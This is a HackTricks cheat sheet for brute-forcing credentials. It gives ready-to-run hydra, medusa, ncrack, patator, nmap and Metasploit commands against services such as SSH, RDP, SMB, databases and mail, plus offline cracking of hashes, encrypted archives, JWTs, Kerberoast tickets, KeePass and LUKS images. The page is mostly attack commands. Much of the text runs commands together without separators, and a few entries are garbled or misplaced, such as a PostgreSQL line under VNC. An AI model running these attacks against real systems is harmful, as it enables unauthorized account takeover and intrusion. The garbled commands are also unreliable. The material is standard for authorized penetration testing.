Brute Force - CheatSheet

Do you use Hacktricks every day? Did you find the book very useful? Would you like to receive extra help with cybersecurity questions? Would you like to find more and higher quality content on Hacktricks? Support Hacktricks through github sponsors so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!

If you want to know about my latest modifications/additions or you have any suggestion for HackTricks or PEASS, join the 💬​telegram group, or follow me on Twitter 🐦​@carlospolopm. If you want to share some tricks with the community you can also submit pull requests to https://github.com/carlospolop/hacktricks that will be reflected in this book and don't forget to give ⭐ on github to motivate me to continue developing this book.

Default Credentials

Search in google for default credentials of the technology that is being used, or try this links:

Create your own Dictionaries

Find as much information about the target as you can and generate a custom dictionary. Tools that may help:

Crunch

crunch 4 6 0123456789ABCDEF -o crunch1.txt crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha ​@ Lower case alpha characters, Upper case alpha characters% Numeric characters^ Special characters including spaccrunch 6 8 -t ,@@^^%%

Cewl

cewl example.com -m 5 -w words.txt

Generate passwords based on your knowledge of the victim (names, dates...)

Wordlists

Services

Ordered alphabetically by service name.

AFP

nmap -p 548 --script afp-brute <IP>msf> use auxiliary/scanner/afp/afp_loginmsf> set BLANK_PASSWORDS truemsf> set USER_AS_PASS truemsf> set PASS_FILE <PATH_PASSWDS>msf> set USER_FILE <PATH_USERS>msf> run

AJP

nmap --script ajp-brute -p 8009 <IP>

Cassandra

nmap --script cassandra-brute -p 9160 <IP>

CouchDB

msf> use auxiliary/scanner/couchdb/couchdb_loginhydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /

Docker Registry

hydra -L /usr/share/brutex/wordlists/simple-users.txt  -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/

Elasticsearch

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

FTP

hydra -l root -P passwords.txt [-t 32] <IP> ftpncrack -p 21 --user root -P passwords.txt <IP> [-T 5]medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp

HTTP Generic Brute

HTTP Basic Auth

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10

HTTP - Post Form

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V

For https you have to change from "http-post-form" to "https-post-form"

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com

IMAP

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -Vhydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -Vnmap -sV --script imap-brute -p <PORT> <IP>

IRC

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

JWT

hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt​python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt​john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256​python3 jwt_tool.py -d wordlists.txt <JWT token>​./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8​python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt​jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6

LDAP

nmap --script ldap-brute -p 389 <IP>

Mongo

nmap -sV --script mongodb-brute -n -p 27017 <IP>use auxiliary/scanner/mongodb/mongodb_login

MySQL

hydra -L usernames.txt -P pass.txt <IP> mysqlmsf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

OracleSQL

patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017​./odat.py passwordguesser -s $SERVER -d $SID./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt​msf> use admin/oracle/oracle_loginmsf> set RHOSTS <IP>msf> set RPORT 1521msf> set SID <SID>​msf> use scanner/oracle/oracle_loginmsf> set RHOSTS <IP>msf> set RPORTS 1521msf> set SID <SID>​nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

In order to use oracle_login with patator you need to install:

pip3 install cx_Oracle --upgrade

​Offline OracleSQL hash bruteforce (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):

 nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

POP

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -Vhydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

PostgreSQL

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgresmedusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgresncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txtuse auxiliary/scanner/postgres/postgres_loginnmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

PPTP

You can download the .deb package to install from https://http.kali.org/pool/main/t/thc-pptp-bruter/​

sudo dpkg -i thc-pptp-bruter*.deb cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>

RDP

ncrack -vv --user <User> -P pwds.txt rdp://<IP>hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>

Redis

msf> use auxiliary/scanner/redis/redis_loginnmap --script redis-brute -p 6379 <IP>hydra –P /path/pass.txt redis://<IP>:<PORT> 

Rexec

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

hydra -L <Username_list> rsh://<Victim_IP> -v -V

​http://pentestmonkey.net/tools/misc/rsh-grind​

Rsync

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

hydra -l root -P passwords.txt <IP> rtsp

SNMP

msf> use auxiliary/scanner/snmp/snmp_loginnmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

SMB

nmap --script smb-brute -p 445 <IP>hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1

SMTP

hydra -l <username> -P /path/to/passwords.txt <IP> smtp -Vhydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V 

SOCKS

nmap  -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>

SQL Server

crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txthydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssqlmedusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssqlnmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> msf> use auxiliary/scanner/mssql/mssql_login 

SSH

hydra -l root -P passwords.txt [-t 32] <IP> sshncrack -p 22 --user root -P passwords.txt <IP> [-T 5]medusa -u root -P 500-worst-passwords.txt -h <IP> -M sshpatator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'

Telnet

hydra -l root -P passwords.txt [-t 32] <IP> telnetncrack -p 23 --user root -P passwords.txt <IP> [-T 5]medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

VNC

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vncmedusa -h <IP> –u root -P /root/Desktop/pass.txt –M vncncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>Tpatator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_loginnmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

Winrm

crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

Local

Online cracking databases

• ​https://www.onlinehashcrack.com/ (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...)

• ​https://gpuhash.me/ (Hashes and file hashes)

• ​https://hashkiller.co.uk/Cracker (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)

Check this out before trying to bruteforce a Hash.

ZIP

fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip

zip2john file.zip > zip.johnjohn zip.john

hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt 

7z

cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z

wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.plapt-get install libcompress-raw-lzma-perl./7z2john.pl file.7z > 7zhash.john

PDF

apt-get install pdfcrackpdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txtsudo apt-get install qpdfqpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

JWT

git clone https://github.com/Sjord/jwtcrack.gitcd jwtcrack​python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt​python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.johnjohn jwt.john 

NTLM cracking

Format:USUARIO:ID:HASH_LM:HASH_NT:::john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hasheshashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot

Keepass

sudo apt-get install -y kpcli keepass2john file.kdbx > hash keepass2john -k <file-password> file.kdbx > hash john --wordlist=/usr/share/wordlists/rockyou.txt hash

Keberoasting

john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoasthashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Lucks image

Method 1

Install: https://github.com/glv2/bruteforce-luks​

bruteforce-luks -f ./list.txt ./backup.imgcryptsetup luksOpen backup.img mylucksopenls /dev/mapper/ mount /dev/mapper/mylucksopen /mnt

Method 2

cryptsetup luksDump backup.img dd if=backup.img of=luckshash bs=512 count=4097 hashcat -m 14600 -a 0 luckshash  wordlists/rockyou.txtcryptsetup luksOpen backup.img mylucksopenls /dev/mapper/ mount /dev/mapper/mylucksopen /mnt

Another Luks BF tutorial: http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1​

Mysql

<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d

PGP/GPG Private key

gpg2john private_pgp.key john --wordlist=/usr/share/wordlists/rockyou.txt ./hash

Hash examples: https://openwall.info/wiki/john/sample-hashes​

Hash-identifier

John mutation

Read /etc/john/john.conf and configure it

john --wordlist=words.txt --rules --stdout > w_mutated.txtjohn --wordlist=words.txt --rules=all --stdout > w_mutated.txt 

Hashcat

hashcat --example-hashes | grep -B1 -A2 "NTLM"

Cracking Linux Hashes - /etc/shadow file

 500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

Cracking Windows Hashes

3000 | LM                                               | Operating-Systems1000 | NTLM                                             | Operating-Systems

Cracking Common Application Hashes

  900 | MD4                                              | Raw Hash    0 | MD5                                              | Raw Hash 5100 | Half MD5                                         | Raw Hash  100 | SHA1                                             | Raw Hash10800 | SHA-384                                          | Raw Hash 1400 | SHA-256                                          | Raw Hash 1700 | SHA-512                                          | Raw Hash